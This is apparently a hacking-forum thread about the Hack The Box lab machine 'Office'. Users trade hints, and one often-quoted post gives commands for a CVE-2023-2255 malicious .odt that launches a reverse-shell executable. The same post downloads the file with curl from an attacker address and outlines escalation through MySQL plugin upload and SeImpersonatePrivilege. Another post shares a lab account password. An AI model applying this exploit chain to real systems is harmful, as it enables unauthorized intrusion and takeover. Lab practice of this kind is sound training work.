Office - HTB
by paven - Saturday February 17, 2024 at 03:07 PM
#31
Can anyone give me all the steps in one chat? I got so confused.

#32
any ideas on root?
#33
Any hints for root flag??

Already got the tstark reverse shell.
#34
I have the tstark shell and the user flag.
From there on I have no idea how to move forward.

Could somebody please explain how to get the hash of ppotts from xampp and resume.php?
Can't figure out how to get it from there...
Help is appreciated :)
#35
Is the intended root way using the SeMachineAccountPrivilege?

#36
I got it via both the intended and the unintended way!
This machine was complicated.
If you want the unintended way, which is much easier, you must pivot on the machine and get the port for the mysql service, then run with the credentials for the root you got from the first CVE execution. Then you need to upload the lib/plugin file to the plugins directory, then you get more creds to then run *something that has to do with the privilege SeImpersonatePrivilege Impersonate a client after authentication Enabled*
Then you have rooted it.
For the intended way you need to get access to ppotts, which is easy peasy lemon squeezy:
https://github.com/elweth-sec/CVE-2023-2255
then
python CVE-2023-2255.py --cmd "c:\users\public\shell.exe" --output azerty.odt

ON THE TSTARK USER:
C:\xampp\htdocs\> curl http://10.10.XX/azerty.odt -o azerty.odt
(It's downloading the odt file; it must go to C:\xampp\htdocs\internal\applications\azerty.odt)
Then you get a shell on the listener as the ppotts user.
Now do:
Get-WmiObject -Class Win32_ComputerSystem | Select-Object UserName
You see multiple sessions. From here it's easy! Good luck!
#37
(Feb 18, 2024, 01:04 PM) gtastav Wrote:
I got it via both the intended and the unintended way!
This machine was complicated.
If you want the unintended way, which is much easier, you must pivot on the machine and get the port for the mysql service, then run with the credentials for the root you got from the first CVE execution. Then you need to upload the lib/plugin file to the plugins directory, then you get more creds to then run *something that has to do with the privilege SeImpersonatePrivilege Impersonate a client after authentication Enabled*
Then you have rooted it.
For the intended way you need to get access to ppotts, which is easy peasy lemon squeezy:
https://github.com/elweth-sec/CVE-2023-2255
then
python CVE-2023-2255.py --cmd "c:\users\public\shell.exe" --output azerty.odt

ON THE TSTARK USER:
C:\xampp\htdocs\> curl http://10.10.XX/azerty.odt -o azerty.odt
(It's downloading the odt file; it must go to C:\xampp\htdocs\internal\applications\azerty.odt)
Then you get a shell on the listener as the ppotts user.
Now do:
Get-WmiObject -Class Win32_ComputerSystem | Select-Object UserName
You see multiple sessions. From here it's easy! Good luck!

What do you mean, find the SQL port?
My nmap does not find anything closely related to that...! I already have the root:password for the DB but I'm kind of lost on where to go now.
I already tried to enumerate all the things, and also don't know how you guys found out the tstark username...

Any hints please?
#38
Try the directory

C:\Windows\Temp\
#39
(Feb 18, 2024, 01:47 PM)fatgirl Wrote:
(Feb 18, 2024, 01:35 PM)fdsfsdgsgfsfds324 Wrote:
(Feb 18, 2024, 01:04 PM) gtastav Wrote:
I got it via both the intended and the unintended way!
This machine was complicated.
If you want the unintended way, which is much easier, you must pivot on the machine and get the port for the mysql service, then run with the credentials for the root you got from the first CVE execution. Then you need to upload the lib/plugin file to the plugins directory, then you get more creds to then run *something that has to do with the privilege SeImpersonatePrivilege Impersonate a client after authentication Enabled*
Then you have rooted it.
For the intended way you need to get access to ppotts, which is easy peasy lemon squeezy:
https://github.com/elweth-sec/CVE-2023-2255
then
python CVE-2023-2255.py --cmd "c:\users\public\shell.exe" --output azerty.odt

ON THE TSTARK USER:
C:\xampp\htdocs\> curl http://10.10.XX/azerty.odt -o azerty.odt
(It's downloading the odt file; it must go to C:\xampp\htdocs\internal\applications\azerty.odt)
Then you get a shell on the listener as the ppotts user.
Now do:
Get-WmiObject -Class Win32_ComputerSystem | Select-Object UserName
You see multiple sessions. From here it's easy! Good luck!

What do you mean, find the SQL port?
My nmap does not find anything closely related to that...! I already have the root:password for the DB but I'm kind of lost on where to go now.
I already tried to enumerate all the things, and also don't know how you guys found out the tstark username...

Any hints please?

That poster didn't hack it on their own; they won't be able to help you much further.

here is your gift
OFFICE\web_account:verytoughpassword123!

Can you please tell me where exactly you found this?
#40
(Feb 18, 2024, 01:35 PM)fdsfsdgsgfsfds324 Wrote:
(Feb 18, 2024, 01:04 PM) gtastav Wrote:
I got it via both the intended and the unintended way!
This machine was complicated.
If you want the unintended way, which is much easier, you must pivot on the machine and get the port for the mysql service, then run with the credentials for the root you got from the first CVE execution. Then you need to upload the lib/plugin file to the plugins directory, then you get more creds to then run *something that has to do with the privilege SeImpersonatePrivilege Impersonate a client after authentication Enabled*
Then you have rooted it.
For the intended way you need to get access to ppotts, which is easy peasy lemon squeezy:
https://github.com/elweth-sec/CVE-2023-2255
then
python CVE-2023-2255.py --cmd "c:\users\public\shell.exe" --output azerty.odt

ON THE TSTARK USER:
C:\xampp\htdocs\> curl http://10.10.XX/azerty.odt -o azerty.odt
(It's downloading the odt file; it must go to C:\xampp\htdocs\internal\applications\azerty.odt)
Then you get a shell on the listener as the ppotts user.
Now do:
Get-WmiObject -Class Win32_ComputerSystem | Select-Object UserName
You see multiple sessions. From here it's easy! Good luck!

What do you mean, find the SQL port?
My nmap does not find anything closely related to that...! I already have the root:password for the DB but I'm kind of lost on where to go now.
I already tried to enumerate all the things, and also don't know how you guys found out the tstark username...

Any hints please?

The mysql port is 3306 and it's running on localhost, so you may need to port forward!